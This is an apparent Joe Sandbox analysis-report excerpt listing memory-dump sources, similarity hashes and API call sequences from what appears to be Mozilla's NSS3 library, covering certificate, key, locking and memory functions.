                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                                                                                                                                                                                      • String ID: security
                                                                                                                                                                                                                                                      • API String ID: 3441714441-3315324353
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C539890: TlsGetValue.KERNEL32(?,?,?,6C5397EB), ref: 6C53989E
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C58AF88
                                                                                                                                                                                                                                                      • _PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6C58AFCE
                                                                                                                                                                                                                                                      • PR_SetPollableEvent.NSS3(?), ref: 6C58AFD9
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C58AFEF
                                                                                                                                                                                                                                                      • _PR_MD_NOTIFY_CV.NSS3(?), ref: 6C58B00F
                                                                                                                                                                                                                                                      • _PR_MD_UNLOCK.NSS3(?), ref: 6C58B02F
                                                                                                                                                                                                                                                      • _PR_MD_UNLOCK.NSS3(?), ref: 6C58B070
                                                                                                                                                                                                                                                      • PR_JoinThread.NSS3(?), ref: 6C58B07B
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C58B084
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C58B09B
                                                                                                                                                                                                                                                      • _PR_MD_UNLOCK.NSS3(?), ref: 6C58B0C4
                                                                                                                                                                                                                                                      • PR_JoinThread.NSS3(?), ref: 6C58B0F3
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C58B0FC
                                                                                                                                                                                                                                                      • PR_JoinThread.NSS3(?), ref: 6C58B137
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C58B140
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 235599594-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C502BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C502A28,00000060,00000001), ref: 6C502BF0
                                                                                                                                                                                                                                                        • Part of subcall function 6C502BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C502A28,00000060,00000001), ref: 6C502C07
                                                                                                                                                                                                                                                        • Part of subcall function 6C502BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6C502A28,00000060,00000001), ref: 6C502C1E
                                                                                                                                                                                                                                                        • Part of subcall function 6C502BE0: free.MOZGLUE(?,00000000,00000000,?,6C502A28,00000060,00000001), ref: 6C502C4A
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505D0F
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505D4E
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505D62
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505D85
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505D99
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505DFA
                                                                                                                                                                                                                                                      • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505E33
                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C505E3E
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C505E47
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C505E60
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6C50AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C505E78
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,6C50AAD4), ref: 6C505EB9
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,6C50AAD4), ref: 6C505EF0
                                                                                                                                                                                                                                                      • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C50AAD4), ref: 6C505F3D
                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C50AAD4), ref: 6C505F4B
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4273776295-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?), ref: 6C488E22
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C488E36
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 6C488E4F
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,?,?,?), ref: 6C488E78
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C488E9B
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C488EAC
                                                                                                                                                                                                                                                      • PL_ArenaAllocate.NSS3(?,?), ref: 6C488EDE
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C488EF0
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 6C488F00
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C488F0E
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C488F39
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 6C488F4A
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 6C488F5B
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C488F72
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C488F82
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1569127702-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_Lock.NSS3(?), ref: 6C581000
                                                                                                                                                                                                                                                        • Part of subcall function 6C539BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C461A48), ref: 6C539BB3
                                                                                                                                                                                                                                                        • Part of subcall function 6C539BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C461A48), ref: 6C539BC8
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C581016
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C581021
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C581046
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C58106B
                                                                                                                                                                                                                                                      • PR_Lock.NSS3 ref: 6C581079
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C581096
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C5810A7
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C5810B4
                                                                                                                                                                                                                                                      • PR_DestroyCondVar.NSS3(?), ref: 6C5810BF
                                                                                                                                                                                                                                                      • PR_DestroyCondVar.NSS3(?), ref: 6C5810CA
                                                                                                                                                                                                                                                      • PR_DestroyCondVar.NSS3(?), ref: 6C5810D5
                                                                                                                                                                                                                                                      • PR_DestroyCondVar.NSS3(?), ref: 6C5810E0
                                                                                                                                                                                                                                                      • PR_DestroyLock.NSS3(?), ref: 6C5810EB
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C581105
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 8544004-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C3FDD56
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6C3FDD7C
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C3FDE67
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6C3FDEC4
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3FDECD
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: memcpy$_byteswap_ulong
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 2339628231-598938438
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?), ref: 6C4BEE0B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4BEEE1
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C4B1D7E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B1D50: EnterCriticalSection.KERNEL32(?), ref: 6C4B1D8E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B1D50: PR_Unlock.NSS3(?), ref: 6C4B1DD3
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4BEE51
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4BEE65
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4BEEA2
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4BEEBB
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4BEED0
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4BEF48
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4BEF68
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4BEF7D
                                                                                                                                                                                                                                                      • PK11_DoesMechanism.NSS3(?,?), ref: 6C4BEFA4
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4BEFDA
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C4BF055
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4BF060
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2524771861-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PK11_SignatureLen.NSS3(?), ref: 6C484D80
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000000), ref: 6C484D95
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C484DF2
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C484E2C
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE028,00000000), ref: 6C484E43
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C484E58
                                                                                                                                                                                                                                                      • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C484E85
                                                                                                                                                                                                                                                      • DER_Encode_Util.NSS3(?,?,6C5D05A4,00000000), ref: 6C484EA7
                                                                                                                                                                                                                                                      • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C484F17
                                                                                                                                                                                                                                                      • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C484F45
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C484F62
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C484F7A
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C484F89
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C484FC8
Memory Dump Source
• Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2843999940-0
                                                                                                                                                                                                                                                      • Opcode ID: d0429b69ca66dd52f004e62b6e1623ef08d55cc0dad0dd1da7617af487e0a603
                                                                                                                                                                                                                                                      • Instruction ID: 5c63956e96acee10e56fcd7e79b5c755962903df295741b02458712373cb5646
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0429b69ca66dd52f004e62b6e1623ef08d55cc0dad0dd1da7617af487e0a603
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0881AF71A0A301AFE701CF28D850F5AB7E8AB84398F15952DFA58DB740E731E905CB92
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6C4C5C9B
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6C4C5CF4
                                                                                                                                                                                                                                                      • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6C4C5CFD
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6C4C5D42
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6C4C5D4E
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4C5D78
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C4C5E18
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4C5E5E
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4C5E72
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4C5E8B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C4BF854
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C4BF868
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C4BF882
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(04C483FF,?,?), ref: 6C4BF889
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C4BF8A4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C4BF8AB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C4BF8C9
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BF820: free.MOZGLUE(280F10EC,?,?), ref: 6C4BF8D0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
                                                                                                                                                                                                                                                      • String ID: d$tokens=[0x%x=<%s>]
                                                                                                                                                                                                                                                      • API String ID: 2028831712-1373489631
                                                                                                                                                                                                                                                      • Opcode ID: 588bc3f440a294ba95ef7d308cd4abfb00defd64815552fb2eafc76f830cdf9c
                                                                                                                                                                                                                                                      • Instruction ID: d2121954b11c308731a2fa8168b6f5a17192e2d75b69afc2ea580ef96a01b812
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 588bc3f440a294ba95ef7d308cd4abfb00defd64815552fb2eafc76f830cdf9c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3771B4B8B052019BEB01DF25EC45F6E3275AF4531DF144039E8099AB62EB32E915D7E3
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(6C4B9582), ref: 6C4B8F5B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CBE30: SECOID_FindOID_Util.NSS3(6C48311B,00000000,?,6C48311B,?), ref: 6C4CBE44
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C4B8F6A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C4B8FC3
                                                                                                                                                                                                                                                      • PK11_GetIVLength.NSS3(-00000001), ref: 6C4B8FE0
                                                                                                                                                                                                                                                      • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C59D820,6C4B9576), ref: 6C4B8FF9
                                                                                                                                                                                                                                                      • DER_GetInteger_Util.NSS3(?), ref: 6C4B901D
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(?), ref: 6C4B903E
                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C4B9062
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000024,?,?), ref: 6C4B90A2
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(?), ref: 6C4B90CA
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000018,?,?), ref: 6C4B90F0
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C4B912D
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4B9136
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C4B9145
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3626836424-0
                                                                                                                                                                                                                                                      • Opcode ID: 3f6ce0cfddb13e447ecb2fb3232799d84fca09c6c8a975579e41fb96c0001692
                                                                                                                                                                                                                                                      • Instruction ID: d36f2f11bbee2b8d92e01056e296a2a99b088d866e251e541716e2e63982138d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f6ce0cfddb13e447ecb2fb3232799d84fca09c6c8a975579e41fb96c0001692
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A51D4B1A042409BEB00DF28DC81F9A77F8AFA4318F054529E859E7741E776E945CBE2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6C46AF47
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 6C46AF6D
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C46AFA4
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C46AFAA
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6C46AFB5
                                                                                                                                                                                                                                                      • PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C46AFF5
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6C46B005
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C46B014
                                                                                                                                                                                                                                                      • PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6C46B028
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C46B03C
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
                                                                                                                                                                                                                                                      • String ID: %s decr => %d$Unloaded library %s
                                                                                                                                                                                                                                                      • API String ID: 4015679603-2877805755
                                                                                                                                                                                                                                                      • Opcode ID: 41c737bc3c018ab29d7348c0c21b6205c1a0d1a347188bc064dd3c8a9b0fb098
                                                                                                                                                                                                                                                      • Instruction ID: b7cf09218529176aab2947cdd7d486e66ffc8663187d5986027ced8389707b8b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41c737bc3c018ab29d7348c0c21b6205c1a0d1a347188bc064dd3c8a9b0fb098
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6531F1B4B04921ABEB00EE62DC40F1AB7B4EF45319B194125E80987F04F722F825CBE6
                                                                                                                                                                                                                                                      APIs
